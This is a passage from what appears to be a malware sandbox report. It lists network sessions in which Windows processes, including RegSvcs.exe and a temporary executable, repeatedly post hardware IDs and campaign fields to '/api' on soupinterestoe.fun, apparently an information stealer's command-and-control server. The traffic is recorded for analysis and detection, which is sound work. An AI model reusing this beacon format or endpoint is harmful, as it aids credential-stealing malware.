Dec 27, 2023 18:13:03.739619970 CET	34	IN	Data Raw: 65 37 36 39 39 34 2d 44 46 57 0d 0a 0d 0a 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: e76994-DFWfok 212.102.41.2
Dec 27, 2023 18:13:03.739629030 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49783	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:03.163980007 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:03.164043903 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:03.685240984 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=b6d46rjvrt1stboje3udnrf288; expires=Sun, 21-Apr-2024 10:59:42 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:03 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:03 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:03 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EMVyNIelz2iRhuNEztaxILkQq%2F5xJLFXlZbx5amx0DqThc4uho2MtvlGqGJ2ocvEnUuHZHuXLUE4nwrBKc%2FrInXvY%2FvL7wBNLSpudqKD5GC30t5bv5YZkeZOFZnFH2TAe9VTA1I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331232f7 Data Raw: Data Ascii:
Dec 27, 2023 18:13:03.685254097 CET	39	IN	Data Raw: 37 32 66 38 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 72f8-DFW15Malformed packet data
Dec 27, 2023 18:13:03.685265064 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49785	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:04.030179024 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:04.030245066 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:04.563781023 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=llg5s2h0hgg1sv9rn89eib9u9n; expires=Sun, 21-Apr-2024 10:59:43 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:04 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:04 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:04 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MBae2%2BLZ%2B2MkVUq22CRcUwSUiTI8Uj06KvyOV4BLL5d1uoTpDaj1dFB%2BZwcoyjxmqMTZngbpEGnKCBwbUzDuiXhFGhfTrU%2FCQStDujuC9KmBEc7MFVbuVnDIxH0FnYDWmW9iZXY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331289 Data Raw: Data Ascii:
Dec 27, 2023 18:13:04.563839912 CET	41	IN	Data Raw: 65 30 65 38 31 62 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: e0e81b-DFW15Malformed packet data
Dec 27, 2023 18:13:04.563874960 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49786	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:05.025511026 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:05.025528908 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:05.406958103 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=nk7qil4ajtd4hnp38pjv81irqg; expires=Sun, 21-Apr-2024 10:59:44 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iZ449kLR4GzK4s%2FJBMfiZcxXZJnOwqhE4DU4Acs7es7p8S2STmH4HAgPa7LZh16iLv%2BYNniaIImMgr6uvyLt0iUbAKRpBIPAw%2Bw3baIREKnCGmiMuApzbxAMl%2FgdPgD7iyNQzX4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c3312ec Data Raw: Data Ascii:
Dec 27, 2023 18:13:05.406970978 CET	41	IN	Data Raw: 34 39 36 62 37 31 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 496b71-DFW15Malformed packet data
Dec 27, 2023 18:13:05.406981945 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49787	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:05.045480967 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:05.045634031 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:05.432883978 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=qgsqs290rko967j1eavc0ecsj7; expires=Sun, 21-Apr-2024 10:59:44 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BgS19QUBKrp7x20W5trRGAEBGo%2BLre3Hx%2BT87ushUvMfL99HHOqyLFgQgfr0H%2FEb%2FJGkfQpQokV9rGCMDINbkoqi%2Ft%2B0TM2FuZRRneToZQVk%2FDR6%2Fyz9R5mMN2nREcWoTIm8MoI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8 Data Raw: Data Ascii:
Dec 27, 2023 18:13:05.432895899 CET	49	IN	Data Raw: 63 33 33 31 32 65 65 63 66 38 65 37 31 32 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: c3312eecf8e712-DFW15Malformed packet data
Dec 27, 2023 18:13:05.432905912 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49788	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:05.826489925 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:05.826556921 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:06.357928991 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=kpbudcv87ad5era6rpvtqe49u3; expires=Sun, 21-Apr-2024 10:59:45 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5rJ2ExZBqbCcrbh%2Br8MmRX3c3EUYNeNEB4mj0qhigt%2F0wNCjHpTuxcSEaHB%2FWz3Dl8gHn0xaAX%2FskM%2FKut2SxZYfvtyJqc9x83SNHL0tof5iUb8h%2BcKUi7F8GJ9EdgpZeQ%2FUzTQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c Data Raw: Data Ascii:
Dec 27, 2023 18:13:06.357942104 CET	47	IN	Data Raw: 33 31 33 33 64 39 35 39 30 62 63 66 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 3133d9590bcf-DFW15Malformed packet data
Dec 27, 2023 18:13:06.357954979 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49789	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:05.827291965 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:05.827513933 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:06.215046883 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=lbv9lv57p3q62bvm8o7l8fpoau; expires=Sun, 21-Apr-2024 10:59:45 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kKL2osz3d9bo7j95ciKC5L6frFZqmlp3kHK6LhGpFOBID7uCdKRu1s5NVEEKSMyj9uMJ7kuxgH%2BzvZTObPT5%2BmbKydP%2Frnyums9gwc5HLbdYSIHwCle2o3Oecr52dvlMqCTcPVw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c33133d8c Data Raw: Data Ascii:
Dec 27, 2023 18:13:06.215058088 CET	39	IN	Data Raw: 36 63 35 35 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 6c55-DFW15Malformed packet data
Dec 27, 2023 18:13:06.215066910 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49790	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:06.651643991 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:06.651731014 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:07.032514095 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=q849vulcdakntsubdshfnsj5v1; expires=Sun, 21-Apr-2024 10:59:45 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1q7hi9Yb7srpflbXgwnJ31UINqvgAUJoc7Wkv4mbhAuJFEdIT%2FOCAPVIM85xZFUDFKUJ%2Bj3dDniKDAJ2rTBmtymQ3%2FI%2BPKqE0g8pzO3RugfgWZKo7A0C9aRgptCYGoYuLHgh8Kg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c33138f Data Raw: Data Ascii:
Dec 27, 2023 18:13:07.032526970 CET	41	IN	Data Raw: 32 61 36 63 33 33 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 2a6c33-DFW15Malformed packet data
Dec 27, 2023 18:13:07.032650948 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49791	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:07.332858086 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 18:13:07.332926989 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:07.876914024 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=73em9lklriotl17t2efvde3o8v; expires=Sun, 21-Apr-2024 10:59:46 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:07 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:07 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:07 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fWW7IxgdMNhZwyWp0ClmM2JpjM%2FX8mw%2FEzBYPON16zVL%2BiwXe5b5p0iEhgx7OWM4dwMBkZESebg8hszyPgH3p6TRiLe6AWPUvpBOqpQlreQq9t9UrTlK2Ac5BT7O90SMG0PJKtA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c3313d382 Data Raw: Data Ascii:
Dec 27, 2023 18:13:07.876935005 CET	39	IN	Data Raw: 34 36 34 32 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 4642-DFW15Malformed packet data
Dec 27, 2023 18:13:07.876945019 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49792	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:08.183132887 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
